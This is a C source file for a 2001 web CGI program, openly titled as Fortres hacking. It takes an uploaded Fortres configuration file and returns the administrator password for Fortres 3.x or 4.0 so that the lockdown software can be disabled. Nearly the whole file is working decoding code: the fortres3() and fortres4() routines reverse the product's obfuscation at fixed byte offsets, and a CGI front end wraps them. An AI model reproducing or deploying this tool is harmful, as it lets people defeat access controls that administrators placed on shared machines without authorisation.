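/* This file is part of:
 *
 * fortres.cgi - A CGI application for decrypting administrator
 *               passwords for disabling Fortres
 *
 * Copyright 2001 David Barksdale
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

/* NOTE(review): the header names and the HTML tags inside shout() did not
 * survive in the listing this was taken from.  The four headers below are
 * the ones the calls in this file need; the tags are a minimal
 * reconstruction and may differ from the author's markup. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

enum {
    MAX_UPLOAD        = 16384, /* largest request body accepted */
    PASSWD_MAX        = 64,    /* size of the password buffer used by main() */

    FORTRES3_KEY_OFF  = 234,   /* v3.x: key bytes start here ...            */
    FORTRES3_KEY_LEN  = 103,
    FORTRES3_DATA_OFF = 337,   /* ... and the obfuscated record follows them */
    FORTRES3_DATA_LEN = 648,
    FORTRES3_PW_OFF   = 16,    /* password offset inside the decoded record */

    FORTRES4_HEAD_OFF = 4,     /* v4.0: first byte of the forward walk  */
    FORTRES4_STRIDE   = 18,    /* distance between forward-walk bytes   */
    FORTRES4_TAIL_OFF = 454,   /* first byte of the backward walk       */

    /* Highest offset fortres4() can touch with a PASSWD_MAX buffer, plus one.
     * It is larger than the 985 bytes fortres3() reads, so padding the upload
     * by this much keeps both decoders inside the allocation. */
    DECODE_PAD = FORTRES4_HEAD_OFF + FORTRES4_STRIDE * (PASSWD_MAX - 2) + 1
};

/* Rotate the 8-bit value x left by pos bits (pos is taken modulo 8). */
unsigned char rotl(unsigned char x, unsigned long pos)
{
    unsigned int shift = (unsigned int) (pos % 8);

    /* x is promoted to int, so the shift by 8 that occurs when shift == 0
     * is well defined and contributes nothing. */
    return (unsigned char) ((x << shift) | (x >> (8 - shift)));
}

/*
 * Decode a Fortres v3.x password.
 *
 * file   - start of the uploaded file image; the caller must guarantee that
 *          FORTRES3_DATA_OFF + FORTRES3_DATA_LEN (985) bytes are readable
 * passwd - output buffer
 * len    - capacity of passwd in bytes
 *
 * Returns 0 with a NUL-terminated password in passwd, or -1 when the decoded
 * record does not end in the expected 'C' marker.  On -1 the contents of
 * passwd are unspecified.
 *
 * Every input to the transform (key, record, constants) comes from the file
 * itself, so what the file stores is a reversible encoding, not a one-way
 * hash.
 */
int fortres3(unsigned const char *file, char *passwd, unsigned long len)
{
    unsigned char buff[FORTRES3_DATA_LEN], key[FORTRES3_KEY_LEN];
    unsigned long i, j;

    memcpy(key, file + FORTRES3_KEY_OFF, sizeof key);
    memcpy(buff, file + FORTRES3_DATA_OFF, sizeof buff);

    /* The key index is advanced before use, so key[1] is consumed first. */
    for (i = 0, j = 0; i < sizeof buff; i++) {
        j = (j + 1) % sizeof key;
        buff[i] = rotl((unsigned char) (rotl(buff[i], i) ^ key[j]), i) ^ 0xB2;
    }

    /* Four password bytes are stored out of line further into the record. */
    buff[16] = buff[97];
    buff[18] = buff[109];
    buff[20] = buff[73];
    buff[21] = buff[57];

    for (i = 0;
         i < len && i + FORTRES3_PW_OFF < sizeof buff
             && buff[i + FORTRES3_PW_OFF];
         i++)
        passwd[i] = (char) (buff[i + FORTRES3_PW_OFF] + 0x1B);

    /* Nothing decoded (empty record or len == 0): there is no last byte to
     * inspect, and looking at passwd[i - 1] would read before the buffer. */
    if (i == 0 || passwd[i - 1] != 'C')
        return -1;
    passwd[i - 1] = '\0';
    return 0;
}

/*
 * Decode a Fortres v4.0 password.
 *
 * file   - start of the uploaded file image; the caller must guarantee that
 *          offsets up to FORTRES4_HEAD_OFF + FORTRES4_STRIDE * (len - 2) and
 *          up to FORTRES4_TAIL_OFF are readable
 * passwd - output buffer
 * len    - capacity of passwd in bytes
 *
 * Decoding stops at the first byte that is a lowercase letter or is not
 * printable.  Returns 0 with a NUL-terminated password, or -1 if no
 * character was decoded.
 */
int fortres4(unsigned const char *file, char *passwd, unsigned long len)
{
    unsigned long i, j;

    /* With len == 0 there is no room even for the terminator, and the
     * original "len - 1" bound would wrap around. */
    if (len == 0)
        return -1;

    for (i = 0, j = FORTRES4_HEAD_OFF;
         i + 1 < len && i <= (unsigned long) FORTRES4_TAIL_OFF;
         i++, j += FORTRES4_STRIDE) {
        /* <ctype.h> needs an unsigned char value, so classify the byte
         * before it is narrowed to a possibly signed char. */
        unsigned char c =
            (unsigned char) (file[j] - file[FORTRES4_TAIL_OFF - i] + i * 3);

        passwd[i] = (char) c;
        if ((isalpha(c) && !isupper(c)) || !isprint(c))
            break;
    }
    passwd[i] = '\0';
    return i == 0 ? -1 : 0;
}

/* Write s to stdout with the HTML metacharacters replaced by entities. */
static void put_html_escaped(const char *s)
{
    for (; *s != '\0'; s++) {
        switch (*s) {
        case '&':  fputs("&amp;", stdout);  break;
        case '<':  fputs("&lt;", stdout);   break;
        case '>':  fputs("&gt;", stdout);   break;
        case '"':  fputs("&quot;", stdout); break;
        case '\'': fputs("&#39;", stdout);  break;
        default:   putchar((unsigned char) *s); break;
        }
    }
}

/*
 * Emit the complete CGI response: header, page frame and one message.
 *
 * err  - non-zero to present text as an error
 * text - message to show; main() passes strings that contain bytes decoded
 *        from the uploaded file, so it is escaped before it reaches the page
 *
 * Returns -1 when err is set and 0 otherwise, so main() can return the
 * result directly as the process status.
 */
int shout(int err, char *text)
{
    fputs("Content-Type: text/html\n\n"
          "<html>\n"
          "<head>\n"
          " <title>Amatus' Provocative Chocolate - Fortres Hacking</title>\n"
          "</head>\n"
          "<body>\n", stdout);
    fputs(err ? "<p>Error: " : "<p>", stdout);
    put_html_escaped(text);
    fputs("</p>\n", stdout);
    fputs("</body>\n</html>\n", stdout);
    return err ? -1 : 0;
}

/*
 * CGI entry point: read a multipart/form-data POST from stdin, locate the
 * part named "file", and try the v3.x and then the v4.0 decoder on it.
 */
int main(void)
{
    char temp[100], passwd[PASSWD_MAX];
    const char *method = getenv("REQUEST_METHOD");
    const char *ctype = getenv("CONTENT_TYPE");
    const char *clen = getenv("CONTENT_LENGTH");
    unsigned char *buff;
    const unsigned char *file;
    char *mark, *end;
    long len;
    int rc;

    /* The server may leave any of these unset; getenv() then returns NULL,
     * which must not reach strcmp()/strtol(). */
    if (method == NULL || strcmp(method, "POST") != 0)
        return shout(1, "Try the POST method next time");
    if (ctype == NULL || strncmp(ctype, "multipart/form-data", 19) != 0)
        return shout(1, "I don't recognise your CONTENT_TYPE");
    if (clen == NULL)
        return shout(1, "I don't understand your form data");

    /* An out-of-range value saturates to LONG_MIN/LONG_MAX and is caught by
     * the range test below, so errno is not needed. */
    len = strtol(clen, &end, 10);
    if (end == clen || *end != '\0')
        return shout(1, "I don't understand your form data");
    if (len < 0 || len > MAX_UPLOAD)
        return shout(1, "Too much data");

    /* Zero-filled and over-allocated by DECODE_PAD: the decoders read at
     * fixed offsets from the start of the file part, and an upload shorter
     * than those offsets must not let them run past the allocation.  The
     * zero fill also terminates the buffer for strstr(), including when
     * fread() delivers fewer bytes than announced. */
    buff = calloc((size_t) len + DECODE_PAD + 1, 1);
    if (buff == NULL)
        return shout(1, "Too little memory");
    (void) fread(buff, 1, (size_t) len, stdin);

    /* strstr() stops at the first NUL byte, so the part headers have to
     * precede any binary content in the request body. */
    mark = strstr((char *) buff, "name=\"file\"");
    if (mark != NULL)
        mark = strstr(mark + 11, "\r\n\r\n");
    if (mark == NULL) {
        free(buff);
        return shout(1, "I don't understand your form data");
    }
    file = (const unsigned char *) mark + 4;

    if (fortres3(file, passwd, sizeof passwd) != -1) {
        snprintf(temp, sizeof temp, "Fortres v3.x password: %s", passwd);
        rc = shout(0, temp);
    } else if (fortres4(file, passwd, sizeof passwd) != -1) {
        snprintf(temp, sizeof temp, "Fortres v4.0 password: %s", passwd);
        rc = shout(0, temp);
    } else {
        rc = shout(1, "I was unable to retreive the password");
    }
    free(buff);
    return rc;
}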